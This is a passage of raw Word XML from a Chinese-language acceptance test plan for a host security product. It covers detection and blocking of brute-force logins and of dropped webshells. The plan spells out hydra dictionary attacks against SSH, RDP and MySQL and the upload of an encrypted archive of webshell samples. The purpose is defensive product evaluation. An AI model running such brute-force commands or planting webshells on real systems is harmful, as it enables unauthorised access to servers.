              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="42"/>
              </w:numPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="312"/>
              </w:tabs>
              <w:rPr>
                <w:rFonts w:eastAsia="宋体" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:eastAsia="宋体" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>打开对应测试主机的暴力破解防护和暴力破解成功监测</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="42"/>
              </w:numPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="312"/>
              </w:tabs>
              <w:rPr>
                <w:rFonts w:eastAsia="宋体" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:eastAsia="宋体" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>在攻击机</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="宋体" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>oracle-76-01</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:eastAsia="宋体" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>上对测试机</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="宋体" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>redhat</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:eastAsia="宋体" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>-67-01和Windows server2012执行不同的攻击语句(密码字典包含正确的登录密码)：</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:eastAsia="宋体" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:br w:type="textWrapping"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:eastAsia="宋体" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>爆破ssh，执行命令：hydra  -L 用户名字典路径 -P 密码字典路径 -vV %ip% ssh</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="420" w:firstLineChars="200"/>
              <w:rPr>
                <w:rFonts w:eastAsia="宋体" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:eastAsia="宋体" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>爆破rdp，执行命令：hydra  -L 用户名字典路径 -P 密码字典路径 -vV %ip% rdp</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="42"/>
              </w:numPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="312"/>
              </w:tabs>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>当爆破工具爆破完成后在服务端查看是否有暴力破解成功和不成功的告警</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="42"/>
              </w:numPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="312"/>
              </w:tabs>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:eastAsia="宋体" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>打开Oracle-76-02的暴力破解防护阻断开关</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="420" w:firstLineChars="200"/>
              <w:rPr>
                <w:rFonts w:eastAsia="宋体" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:eastAsia="宋体" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>爆破Oracle-76-02的MySQL，执行命令：hydra  -L 用户名字典路径 -P 密码字典路径 -vV %ip% mysql</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="42"/>
              </w:numPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="312"/>
              </w:tabs>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:eastAsia="宋体" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>检查攻击机与Oracle-76-02的MySQL3306端口是否能正常通讯</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>(telnet 被爆破主机ip 3306)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="312"/>
              </w:tabs>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:eastAsia="宋体" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>在服务端手动解封攻击机的阻断，检测攻击机与Oracle-76-02上MySQL3306端口的通讯</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>(telnet 被爆破主机ip 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rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312" w:cs="Times New Roman"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>预期结果</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7805" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>结果1（步骤4）：能够检查出暴力破解不成功的告警信息。</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="312"/>
              </w:tabs>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>结果2（步骤4）：能够检查出成功爆破的异常登录告警信息。</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="312"/>
              </w:tabs>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>结果3：攻击机无法与</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:eastAsia="宋体" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Oracle-76-02的MySQL3306</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>端口通讯</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="312"/>
              </w:tabs>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>结果4：手动解封后，攻击机与</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:eastAsia="宋体" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Oracle-76-02上MySQL3306端口通讯正常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rPr>
                <w:rFonts w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>测试工具</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7805"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rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>测试记录</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7805"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rPr>
                <w:rFonts w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>测试结果</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7805" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:eastAsia="宋体" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Tahoma" w:hAnsi="Tahoma" w:eastAsia="宋体" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve">支持发现rdp爆破行为并封禁对应的IP  口 通过   口 未通过  口 未测试 </w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:eastAsia="宋体" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Tahoma" w:hAnsi="Tahoma" w:eastAsia="宋体" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>支持发现mysql爆破行为并封禁对应的IP  口 通过   口 未通过  口 未测试</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:eastAsia="宋体" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Tahoma" w:hAnsi="Tahoma" w:eastAsia="宋体" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>支持发现ssh爆破行为并封禁对应的IP  口 通过   口 未通过  口 未测试</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:eastAsia="宋体" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Tahoma" w:hAnsi="Tahoma" w:eastAsia="宋体" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve">支持解封封禁IP                         </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:eastAsia="宋体" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve">               </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Tahoma" w:hAnsi="Tahoma" w:eastAsia="宋体" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve"> 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rPr>
                <w:rFonts w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>备注</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7805" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma"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rPr>
                <w:rFonts w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>人员签字</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7805" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>建行：</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>____________________</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve">        厂商：</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>____________________</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:bookmarkStart w:id="95" w:name="_Toc1721600511"/>
      <w:bookmarkStart w:id="96" w:name="_Toc31054"/>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>webshell检查</w:t>
      </w:r>
      <w:bookmarkEnd w:id="95"/>
      <w:bookmarkEnd w:id="96"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="28"/>
        <w:tblW w:w="90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7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测试目的</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7776" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Tahoma" w:hAnsi="Tahoma" w:eastAsia="宋体" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>支持在1分钟内及时发现落盘的web shell文件，能够对webshell进行告警，可配置对webshell自动隔离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预置条件</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7776" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:widowControl/>
              <w:textAlignment w:val="top"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Tahoma" w:hAnsi="Tahoma" w:eastAsia="宋体" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>多种类型的webshel（100个），将其中的10个样本放到10级目录下，加密压缩包名为：webshell-100.zip、密码为ccb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测试拓扑：</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7776" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:widowControl/>
              <w:tabs>
                <w:tab w:val="left" w:pos="312"/>
              </w:tabs>
              <w:spacing w:after="200"/>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测试方法</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7776" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:widowControl/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="43"/>
              </w:numPr>
              <w:spacing w:after="200"/>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服务端上开启webshell检测</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:widowControl/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="43"/>
              </w:numPr>
              <w:spacing w:after="200"/>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将webshell-100.zip传到/home/soft/tomcat/webapps</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:widowControl/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="43"/>
              </w:numPr>
              <w:spacing w:after="200"/>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执行解压命令：unzip webshell-100.zip ,根据提示输入解压密码ccb</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:widowControl/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="43"/>
              </w:numPr>
              <w:spacing w:after="200"/>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1-2分钟后到服务端查看监测到的webshell数量</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:widowControl/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="43"/>
              </w:numPr>
              <w:spacing w:after="200"/>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服务端上开启webshell自动隔离</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:widowControl/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="43"/>
              </w:numPr>
              <w:spacing w:after="200"/>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将2个webshell上传到/home/soft/nginx/html</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:br w:type="textWrapping"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>a28df9a4d150611ede643bbdf2ec8712d5cca10f.php</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:after="200"/>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114.jsp</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:widowControl/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="43"/>
              </w:numPr>
              <w:spacing w:after="200"/>
              <w:textAlignment w:val="top"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>1分钟左右在服务端查看告警，在主机上查看/home/soft/nginx/html目录下是否存在上传的2个webshell</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:widowControl/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="43"/>
              </w:numPr>
              <w:spacing w:after="200"/>
              <w:textAlignment w:val="top"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>进入相应模块</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>，</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>对webshell检测规则进行可信度配置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预期结果</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7776" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:after="200"/>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结果1（步骤1-2）：记录webshell检出率</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:after="200"/>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结果2（步骤4-6）：2个webshell文件不存在，被自动隔离，服务端的隔离区内显示2个webshell告警信息</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:br w:type="textWrapping"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>(a28df9a4d150611ede643bbdf2ec8712d5cca10f.php和114.jsp)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:after="200"/>
              <w:textAlignment w:val="top"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>结果</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>3：可对检测规则进行可信度配置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测试工具</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7776" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma"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测试结果</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7776" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:eastAsia="宋体" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Tahoma" w:hAnsi="Tahoma" w:eastAsia="宋体" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve">webshell检出率95%以上   </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:eastAsia="宋体" w:cs="Times New Roman"/>
